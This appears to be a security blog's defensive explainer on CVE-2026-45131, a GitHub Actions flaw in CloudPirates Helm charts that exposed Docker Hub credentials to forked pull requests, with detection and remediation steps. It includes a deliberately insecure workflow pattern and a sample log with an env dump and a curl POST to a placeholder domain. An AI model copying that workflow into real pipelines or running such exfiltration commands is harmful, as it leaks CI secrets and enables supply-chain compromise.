eastbaycyber

CVE-2026-45131: GitHub Actions Vulnerability in CloudPirates

CVE explainers 9 min read
SR
Security Research Desk Expert reviewed
Threat intelligence · Human-verified · Updated 2026-06-01
▲ Escalation ViewOne CVE, briefed at three altitudes — skim the Brief, weigh the Impact, or work the Runbook. The way a SOC actually reads it.
CISOBrief · 30-second brief
Field Value
CVE ID CVE-2026-45131
CVSS score 10.0
Attack vector GitHub Actions workflow misconfiguration leading to attacker-controlled code execution from forked pull requests
Auth required Unknown from NVD CVSS vector; practically, an attacker would need the ability to submit a fork-based pull request
Patch status Patched in commit fcf930211604652aec15085895b6457bc8b73b54 (fcf9302)

TL;DR - Critical GitHub Actions trust-boundary failure in CloudPirates Open Source Helm Charts. - Repositories using states prior to commit fcf9302 are affected and should update immediately. - No confirmed in-the-wild exploitation or public PoC is known, but secret exposure risk is high.

AnalystImpact · assess the risk

What Happened and Why Defenders Should Care

CVE-2026-45131 is a critical CI/CD and supply-chain vulnerability in the CloudPirates-io/helm-charts repository. According to the NVD description, a GitHub Actions workflow named pull-request.yaml executed attacker-controlled code from forked pull requests in a privileged context. That design error exposed repository secrets, including Docker Hub credentials and tokens, without requiring maintainer approval.

This is not a traditional runtime software bug in a deployed application. It is a workflow trust failure in the project’s automation pipeline. For defenders, that distinction matters because the impact extends beyond the repository itself. If secrets in CI are exposed, an attacker may be able to publish poisoned artifacts, tamper with package registries, access other systems reachable by the token set, or abuse release automation. In practical terms, this type of flaw can turn a simple pull request into a software supply-chain compromise path.

The affected product is CloudPirates Open Source Helm Charts, maintained under the CloudPirates-io GitHub organization. Based on the available primary sources, the only confirmed affected range is repository states prior to commit fcf9302. The only confirmed fixed boundary is commit fcf930211604652aec15085895b6457bc8b73b54. No semantic version or release tag was confirmed in the source material, so defenders should not assume a package version boundary that has not been explicitly published.

If you maintain public GitHub repositories, this CVE should also be treated as a pattern warning. The same class of issue appears whenever untrusted pull request content is evaluated in a context that has secrets, elevated GITHUB_TOKEN privileges, or publish rights. Even if you do not use the affected project, you should review your own GitHub Actions workflows for this trust-boundary mistake.

Affected Versions, Fixed Version, and Exposure Scope

The most precise affected version information currently available is commit-based, not release-based. The NVD record states that the issue affects CloudPirates Open Source Helm Charts prior to commit fcf9302, and that it was patched in commit fcf930211604652aec15085895b6457bc8b73b54. That means the confirmed affected range is:

Status Version range
Affected All repository states prior to commit fcf9302
Fixed Commit fcf930211604652aec15085895b6457bc8b73b54 and later

Because no tagged release number was confirmed in the gathered sources, organizations should inventory how they consume this repository. If you forked it, mirrored it, vendored workflow files, or copied its Actions configuration into an internal chart repository, you may still be exposed even if you do not directly deploy the upstream code. This is especially important for teams that replicate upstream GitHub Actions YAML files into their own CI templates.

The exposure scope is also broader than “a secret might leak.” The NVD description specifically mentions Docker Hub credentials and tokens. In many environments, those credentials are enough to publish new images, overwrite tags, or stage malicious images for downstream pulls. If the compromised workflow also had access to other repository or organizational secrets, the blast radius could include source code access, package registry tokens, or deployment credentials. Since the exact secret inventory is not published, defenders should assume worst-case exposure of any secret available to that workflow until proven otherwise.

Exploitation Status and Real-World Risk

At the time of writing, exploitation in the wild is not confirmed. This CVE is not listed in CISA’s Known Exploited Vulnerabilities catalog, which means there is no CISA-backed confirmation of active exploitation. Likewise, a separate public proof of concept was not confirmed in the provided source set. The GitHub Security Advisory exists, but no additional verified exploit repository or PoC reference was established from the available references.

That said, absence of a confirmed PoC does not materially reduce the urgency here. This vulnerability class is usually easy for an attacker to understand once the vulnerable workflow behavior is known. An attacker who can submit a pull request from a fork may attempt to alter files or commands executed by the workflow so that secrets are printed, exfiltrated over the network, or embedded into artifacts. If the workflow combines fork-triggered execution with secret access, the exploit path is often straightforward.

Defenders should clearly communicate the status as follows:

Question Status
Confirmed exploited in the wild? No confirmed evidence from available sources
Public PoC exists? Not confirmed from available sources
CISA KEV listed? No

In the absence of confirmed exploitation data, defenders should assume opportunistic abuse is possible and prioritize remediation based on impact, not just public chatter. Public repositories are continuously probed, and workflow misconfigurations are attractive because they can yield secrets without targeting production systems directly.

Technical Root Cause and Supply-Chain Implications

The root cause is a GitHub Actions workflow trust-boundary failure. The workflow pull-request.yaml allowed attacker-controlled code from forked pull requests to execute in a privileged context. In GitHub Actions, that is dangerous because repository secrets and elevated automation privileges should never be made available to code that originates from an untrusted fork unless very carefully isolated. The NVD description confirms that this workflow design exposed repository secrets without maintainer approval.

From a supply-chain perspective, the concern is not limited to the CloudPirates repository. If Docker Hub credentials were exposed, an attacker might be able to publish malicious images or tamper with release pipelines that downstream users trust. If other repository tokens were available, the attacker could potentially alter artifacts, push code, or move laterally into adjacent automation systems. These are the kinds of impacts that make CI/CD issues disproportionately severe relative to the amount of code involved.

Technical Notes

Defenders should review workflow constructs that commonly create this risk, including event triggers and checkout behavior. A high-level example of the pattern to audit for is:

on:
  pull_request_target:

jobs:
  build:
    permissions: write-all
    steps:
      - uses: actions/checkout@v4
      - run: ./scripts/from-pr.sh
    env:
      DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}

The exact vulnerable YAML for this CVE was not reproduced from source in the gathered material, so do not assume the above snippet is the literal affected file. Treat it as a review pattern. If your workflows resemble this structure, especially where untrusted PR code is checked out and then executed with secrets present, you should consider them high risk until audited.

Additional Resources

For further reading on related topics, check out our articles on What is EDR? A Practitioner’s Definition and How to Prepare for a Security Audit: Checklist & Evidence Tips.

Conclusion

For defenders, the bottom line is simple: if your repository state is prior to fcf9302, patch immediately, rotate any potentially exposed secrets, and audit all GitHub Actions workflows that process fork-based pull requests. This CVE is a reminder that the security boundary in CI/CD is not the codebase alone. It is the automation around it.

This article may contain affiliate links. We earn a commission on qualifying purchases at no extra cost to you.

ResponderRunbook · act now

Detection and Investigation Guidance

The first detection step is to review GitHub Actions workflow history around pull requests from forks. Look for jobs triggered by pull request events where secrets should not have been available, especially if a workflow checked out PR-controlled code and then ran scripts, tests, or packaging tasks with elevated token permissions. Also inspect whether pull-request.yaml or similar workflows were configured in ways that blur trust boundaries between repository code and fork-controlled input.

The second step is to investigate whether secrets may already have been exposed. Review Actions logs for suspicious output, failed steps that unexpectedly printed environment variables, network calls to unrecognized domains, or modifications that introduced shell commands intended to dump tokens. If Docker Hub or other registry credentials were present, review registry audit logs for image pushes, tag changes, or authentications from unusual IP ranges after suspicious PR workflow runs.

Technical Notes

A simple repository-side review can start with searching workflow files for dangerous patterns:

grep -RniE 'pull_request_target|secrets\. |permissions:|actions/checkout' .github/workflows/

If you have a local clone and want to verify whether the fix commit is present:

git rev-parse --verify fcf930211604652aec15085895b6457bc8b73b54
git merge-base --is-ancestor fcf930211604652aec15085895b6457bc8b73b54 HEAD 
  && echo "Fixed commit present" 
  || echo "Potentially vulnerable: fix commit missing"

Concrete GitHub Actions log patterns worth hunting for include unexpected secret handling and outbound calls during PR jobs. Examples:

Run env
DOCKERHUB_TOKEN=***
GITHUB_TOKEN=***
curl -X POST https://<unrecognized-domain>/collect
docker login -u <user> -p ***

If you export GitHub audit or workflow telemetry into a SIEM, a practical detection query is to look for workflow runs on fork-originated pull requests tied to privileged workflows:

SELECT timestamp, repo, workflow_name, event_name, actor, source_repository
FROM github_actions_runs
WHERE event_name IN ('pull_request', 'pull_request_target')
  AND workflow_name = 'pull-request'
  AND source_repository <> repo;

If you do not have this telemetry, assume reduced visibility and focus on reviewing workflow run history, registry access logs, and any secret rotation records. Lack of logs should increase urgency, not reduce it.

Mitigation, Patching, and Containment

The primary remediation is to update to the fixed repository state at commit fcf930211604652aec15085895b6457bc8b73b54. Because no fixed tagged release number was confirmed, the safest instruction is commit-based: ensure your repository includes fcf9302 or later. If you copied the workflow into another repository, you must patch your copy as well; merely tracking the upstream project will not protect forks or internal clones.

Mitigation must also include secret rotation if the vulnerable workflow ever ran against forked pull requests in production use. The NVD description explicitly says repository secrets including Docker Hub credentials and tokens were exposed. Even without confirmed abuse, rotate any credential that may have been accessible to the workflow. Review GitHub Actions permissions, restrict token scopes, remove secrets from PR-triggered jobs, and require explicit maintainer approval before any untrusted code path can run in a privileged context.

Technical Notes

To update a local clone or mirrored repository to include the fix commit:

git fetch origin
git checkout main
git pull origin main
git merge-base --is-ancestor fcf930211604652aec15085895b6457bc8b73b54 HEAD 
  && echo "Repository includes the fix" 
  || echo "Repository still missing the fix"

If you need to pin directly to the fixed commit while validating downstream changes:

git fetch origin
git checkout fcf930211604652aec15085895b6457bc8b73b54

A practical workaround, if immediate upgrade is delayed, is to disable the vulnerable workflow or remove secret access from PR-triggered jobs. For example, temporarily disable the workflow file:

mkdir -p .github/workflows.disabled
git mv .github/workflows/pull-request.yaml .github/workflows.disabled/
git commit -m "Temporarily disable vulnerable pull request workflow pending remediation"

If your workflow model requires PR validation, separate untrusted validation jobs from privileged jobs. Do not expose secrets to fork-based PR runs, and minimize permissions for GITHUB_TOKEN. In the absence of a published vendor hardening guide for this CVE, defenders should apply standard GitHub Actions hardening practices: no secret-bearing jobs on untrusted PR code, least-privilege tokens, and manual approval gates for external contributors where needed.

Last verified: 2026-06-01

Disclaimer: This article may contain affiliate links. We earn a commission on qualifying purchases at no extra cost to you.